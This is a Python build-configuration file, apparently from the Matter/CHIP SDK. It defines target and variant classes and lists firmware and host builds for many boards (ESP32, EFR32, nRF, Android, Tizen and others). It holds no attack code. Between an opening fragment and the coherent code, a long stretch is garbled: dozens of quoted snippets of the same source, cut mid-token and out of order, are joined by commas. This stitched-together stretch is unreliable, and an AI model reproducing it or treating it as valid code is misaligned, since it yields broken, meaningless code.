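    vb = VariantBuilder([Target('linux-x64-light', HostBuilder)])
    vb.AppendVariant(name="ipv6only", enable_ipv4=False)
    vb.AppendVariant(name="tsan", conflicts=['asan'], use_tsan=True)
    vb.AppendVariant(name="asan", conflicts=['tsan'], use_asan=True)
    vb.WhitelistVariantNameForGlob('ipv6only')
    # Returns the base name plus -ipv6only, -tsan, -asan, -ipv6only-tsan and
    # -ipv6only-asan; tsan+asan conflict and are never combined, and only the
    # plain 'ipv6only' variant stays visible to glob-style "build all" runs.
    return [t.name for t in vb.AllVariants()]
# ---------------------------------------------------------------------------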
app=Efr32App.LOCK)) #", "on how to build it (what builder class to use", "app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True)", "variant for variant_count in range(1, len(ok_variants) + 1): for subgroup", "variant to accepted variants. Arguments are construction variants to BuildVariant.", "Build every possible variant for variant_count in range(1, len(ok_variants) +", "# # Unless required by applicable law or agreed to", "['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants():", "that number of potential # builds is exponential here builder.AppendVariant(name=\"rpc\",", "targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch',", "board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note that", "Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import", "target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool',", "validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False),", "not forwarded to proto compiler. ' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def", "app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT,", "o in subgroup]) if name not in self.glob_whitelist: if not", "yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app',", "= Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def", "By default we do not want a 'build all' to", "MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import", "variant_target = target.Clone() for option in subgroup: variant_target = variant_target.Extend(", "se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True)", "__init__(self, targets: List[Target] = []): # note the clone in", "= Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants():", "implied. 
# See the License for the specific language governing", "name **kargs: arguments needed to produce the new build variant", "requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user", "nrf52840dongle for all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE,", "user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only", "yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL)", "enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)", "in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):", "[ HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(),", "app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def", "yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test',", "target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield", "produce the new build variant \"\"\" clone = self.Clone() clone.name", "self.requires = requires def HasConflicts(items: List[BuildVariant]) -> bool: for a,", "self.targets: yield target # skip variants that do not work", "with a \"-\" as separator to the clone name **kargs:", "user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist( 'only", "cross compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP))", "variants for the given targets. 
Handles conflict resolution between build", "validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\",", "in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test',", "app_targets = [] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light',", "def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant to be", "def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS)", "target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'):", "app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)", "= kwargs def Clone(self): \"\"\"Creates a clone of self.\"\"\" clone", "enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32',", "Unless required by applicable law or agreed to in writing,", "release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield", "yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL =", "def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,", "app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light',", "cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't cross compile", "the specific language governing permissions and # limitations under the", "MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg", "InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ]", "= self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def", "yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool',", "yield target # Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)", "app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, 
app=AndroidApp.CHIP_TVServer) yield", "MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder", "def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS)", "use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in", "return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return True", "target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True,", "Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),", "False return True class VariantBuilder: \"\"\"Handles creating multiple build variants", "use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build", "self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier = self.name", "= self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle)", "= Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on", "conflicts variant_target = target.Clone() for option in subgroup: variant_target =", "ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD,", "targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin',", "a \"-\" as separator to the clone name **kargs: arguments", "The number of potential builds is exponential here. 
builder =", "target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else: yield target #", "self.variants if v.validator.Accept(target.name)] # Build every possible variant for variant_count", "] builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering',", "plus parameters on how to build it (what builder class", "AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from", "board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)", "@property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name:", "+ 1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue", "builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board,", "target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend(", "app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build", "variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def HostTargets(): target", "target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump',", "this target ok_variants = [ v for v in self.variants", "default build variants') yield variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(),", "def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a',", "builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board,", "variant \"\"\" clone = self.Clone() clone.name += \"-\" + suffix", "app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))", "Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields", "yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True,", "requires: List[str] = [], **buildargs): self.name = name self.validator =", "import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile", "app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append(", "on a starting target. 
\"\"\" def __init__(self, targets: List[Target] =", "target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105,", "generator: ALL.append(target) # Simple targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light',", "AllVariants(self): \"\"\" Yields a list of acceptable variants for the", "K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from", "builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target", "import Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder class", "or (b.name in a.conflicts): return True return False def AllRequirementsMet(items:", "efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'),", "default sysroot yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else:", "yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target =", "item.requires: if requirement not in available: return False return True", "= [ v for v in self.variants if v.validator.Accept(target.name)] #", "== 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns',", "enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder()", "BuildVariant. 
Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\"", "HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't", "for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH))", "crosscompile does not support libreadline-dev') else: yield target # Without", "bool: for a, b in combinations(items, 2): if (a.name in", "app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc',", "s in self.substr: if s in name: return True return", "**self.create_kw_args) builder.target = self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix,", "typing import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from", "yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield", "validator self.conflicts = conflicts self.buildargs = buildargs self.requires = requires", "'only user requested') ] builder = VariantBuilder() for board_target in", "cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator in", "HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(),", "want a 'build all' to select all variants, so variants", "target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand", "here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False),", "# Possible build variants. # NOTE: The number of potential", "targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for", "VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch',", "You may obtain a copy of the License at #", "object extending its build parameters. Arguments: suffix: appended with a", "app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL)", "# Enable nrf52840dongle for all-clusters and lighting app only yield", "app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend(", "given targets. Handles conflict resolution between build variants and globbing", "True class VariantBuilder: \"\"\"Handles creating multiple build variants based on", "and # limitations under the License. 
import os
from itertools import combinations
from typing import List

from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder
from builders.android import AndroidApp, AndroidBoard, AndroidBuilder
from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder
from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder
from builders.efr32 import Efr32App, Efr32Board, Efr32Builder
from builders.esp32 import Esp32App, Esp32Board, Esp32Builder
from builders.host import HostApp, HostBoard, HostBuilder
from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder
from builders.k32w import K32WApp, K32WBuilder
from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile
from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder
from builders.qpg import QpgApp, QpgBoard, QpgBuilder
from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder
from builders.tizen import TizenApp, TizenBoard, TizenBuilder
from builders.bl602 import Bl602App, Bl602Board, Bl602Builder
from builders.imx import IMXApp, IMXBuilder

class Target:
    """Represents a build target:

    Has a name identifier plus parameters on how to build it (what
    builder class to use and what arguments are required to produce
    the specified build)
    """

    def __init__(self, name, builder_class, **kwargs):
        self.name = name
        self.builder_class = builder_class
        self.glob_blacklist_reason = None
        self.create_kw_args = kwargs

    def Clone(self):
        """Creates a clone of self."""
        clone = Target(self.name, self.builder_class, **self.create_kw_args.copy())
        clone.glob_blacklist_reason = self.glob_blacklist_reason
        return clone

    def Extend(self, suffix, **kargs):
        """Creates a clone of the current object extending its build parameters.

        Arguments:
           suffix: appended with a "-" as separator to the clone name
           **kargs: arguments needed to produce the new build variant
        """
        clone = self.Clone()
        clone.name += "-" + suffix
        clone.create_kw_args.update(kargs)
        return clone

    def Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle: bool):
        builder = self.builder_class(repository_path, runner=runner, **self.create_kw_args)
        builder.target = self
        builder.identifier = self.name
        builder.output_dir = os.path.join(output_prefix, self.name)
        builder.enable_flashbundle(enable_flashbundle)
        return builder

    def GlobBlacklist(self, reason):
        clone = self.Clone()
        if clone.glob_blacklist_reason:
            clone.glob_blacklist_reason += ", "
            clone.glob_blacklist_reason += reason
        else:
            clone.glob_blacklist_reason = reason
        return clone

    @property
    def IsGlobBlacklisted(self):
        return self.glob_blacklist_reason is not None

    @property
    def GlobBlacklistReason(self):
        return self.glob_blacklist_reason
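
# For illustration: Extend() composes names and build arguments, so a
# (hypothetical) chain like the one below names its target
# 'efr32-brd4161a-light' and passes both `board` and `app` through
# create_kw_args to Efr32Builder when Create() runs:
#
#   light = (Target('efr32', Efr32Builder)
#            .Extend('brd4161a', board=Efr32Board.BRD4161A)
#            .Extend('light', app=Efr32App.LIGHT))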

class AcceptAnyName:
    def Accept(self, name: str):
        return True


class AcceptNameWithSubstrings:
    def __init__(self, substr: List[str]):
        self.substr = substr

    def Accept(self, name: str):
        for s in self.substr:
            if s in name:
                return True
        return False


class BuildVariant:
    def __init__(self, name: str, validator=AcceptAnyName(),
                 conflicts: List[str] = [], requires: List[str] = [],
                 **buildargs):
        self.name = name
        self.validator = validator
        self.conflicts = conflicts
        self.buildargs = buildargs
        self.requires = requires


def HasConflicts(items: List[BuildVariant]) -> bool:
    for a, b in combinations(items, 2):
        if (a.name in b.conflicts) or (b.name in a.conflicts):
            return True
    return False


def AllRequirementsMet(items: List[BuildVariant]) -> bool:
    """Check that item.requires is satisfied for all items in the given list"""
    available = set([item.name for item in items])

    for item in items:
        for requirement in item.requires:
            if requirement not in available:
                return False

    return True
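
# For illustration: with variants shaped like the ones HostTargets() registers
# below, HasConflicts() rejects any subgroup containing both 'asan' and
# 'tsan', while AllRequirementsMet() rejects a subgroup with 'libfuzzer'
# unless 'clang' is part of the same subgroup:
#
#   asan = BuildVariant(name='asan', conflicts=['tsan'], use_asan=True)
#   tsan = BuildVariant(name='tsan', conflicts=['asan'], use_tsan=True)
#   fuzz = BuildVariant(name='libfuzzer', requires=['clang'], use_libfuzzer=True)
#
#   HasConflicts([asan, tsan])    # -> True
#   AllRequirementsMet([fuzz])    # -> False ('clang' not in the subgroup)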

class VariantBuilder:
    """Handles creating multiple build variants based on a starting target.
    """

    def __init__(self, targets: List[Target] = []):
        # note the clone in case the default arg is used
        self.targets = targets[:]
        self.variants = []
        self.glob_whitelist = []

    def WhitelistVariantNameForGlob(self, name):
        """
        Whitelist the specified variant to be allowed for globbing.

        By default we do not want a 'build all' to select all variants, so
        variants are generally glob-blacklisted.
        """
        self.glob_whitelist.append(name)

    def AppendVariant(self, **args):
        """
        Add another variant to accepted variants. Arguments are construction
        variants to BuildVariant.

        Example usage:

           builder.AppendVariant(name="ipv6only", enable_ipv4=False)
        """
        self.variants.append(BuildVariant(**args))

    def AllVariants(self):
        """
        Yields a list of acceptable variants for the given targets.

        Handles conflict resolution between build variants and globbing
        whitelist targets.
        """
        for target in self.targets:
            yield target

            # skip variants that do not work for this target
            ok_variants = [v for v in self.variants if v.validator.Accept(target.name)]

            # Build every possible variant
            for variant_count in range(1, len(ok_variants) + 1):
                for subgroup in combinations(ok_variants, variant_count):
                    if HasConflicts(subgroup):
                        continue

                    if not AllRequirementsMet(subgroup):
                        continue

                    # Target ready to be created - no conflicts
                    variant_target = target.Clone()
                    for option in subgroup:
                        variant_target = variant_target.Extend(option.name, **option.buildargs)

                    # Only a few are whitelisted for globs
                    name = '-'.join([o.name for o in subgroup])
                    if name not in self.glob_whitelist:
                        if not variant_target.IsGlobBlacklisted:
                            variant_target = variant_target.GlobBlacklist('Reduce default build variants')

                    yield variant_target
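
# For illustration, a minimal (hypothetical) use of VariantBuilder: the plain
# target is always yielded first, then each non-conflicting combination. A
# target named 'linux-x64-light' with the variant below also yields
# 'linux-x64-light-ipv6only', glob-blacklisted unless 'ipv6only' was
# whitelisted via WhitelistVariantNameForGlob():
#
#   builder = VariantBuilder([some_linux_x64_light_target])
#   builder.AppendVariant(name="ipv6only", enable_ipv4=False)
#   for t in builder.AllVariants():
#       ...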

def HostTargets():
    target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
    target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)

    targets = [target_native]

    # x64 linux supports cross compile
    cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (
        HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName())
    if cross_compile:
        targets.append(target.Extend('arm64', board=HostBoard.ARM64))

    app_targets = []

    # Don't cross compile some builds
    app_targets.append(target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE))
    app_targets.append(target_native.Extend('tv-app', app=HostApp.TV_APP))
    app_targets.append(target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP))
    app_targets.append(target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))

    for target in targets:
        app_targets.append(target.Extend('all-clusters', app=HostApp.ALL_CLUSTERS))
        if (HostBoard.NATIVE.PlatformName() == 'darwin'):
            app_targets.append(target.Extend('chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))
        app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL))
        app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT))
        app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS))
        app_targets.append(target.Extend('light', app=HostApp.LIGHT))
        app_targets.append(target.Extend('lock', app=HostApp.LOCK))
        app_targets.append(target.Extend('shell', app=HostApp.SHELL))
        app_targets.append(target.Extend('ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False))
        app_targets.append(target.Extend('ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))
        app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS))

    builder = VariantBuilder()

    # Possible build variants. Note that number of potential
    # builds is exponential here
    builder.AppendVariant(name="same-event-loop", validator=AcceptNameWithSubstrings(
        ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False)
    builder.AppendVariant(name="no-interactive", validator=AcceptNameWithSubstrings(
        ['-chip-tool']), interactive_mode=False)
    builder.AppendVariant(name="ipv6only", enable_ipv4=False)
    builder.AppendVariant(name="no-ble", enable_ble=False)
    builder.AppendVariant(name="no-wifi", enable_wifi=False)
    builder.AppendVariant(name="tsan", conflicts=['asan'], use_tsan=True)
    builder.AppendVariant(name="asan", conflicts=['tsan'], use_asan=True)
    builder.AppendVariant(name="libfuzzer", requires=["clang"], use_libfuzzer=True)
    builder.AppendVariant(name="clang", use_clang=True)
    builder.AppendVariant(name="test", extra_tests=True)

    builder.WhitelistVariantNameForGlob('no-interactive-ipv6only')
    builder.WhitelistVariantNameForGlob('ipv6only')

    for target in app_targets:
        if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):
            # Single-variant builds
            yield target
        else:
            builder.targets.append(target)

    for target in builder.AllVariants():
        if cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive' not in target.name:
            # Interactive builds will not compile by default on arm cross compiles
            # because libreadline is not part of the default sysroot
            yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev')
        else:
            yield target

    # Without extra build variants
    yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)
    yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE)
    yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE,
                               use_clang=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE,
                               use_platform_mdns=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE,
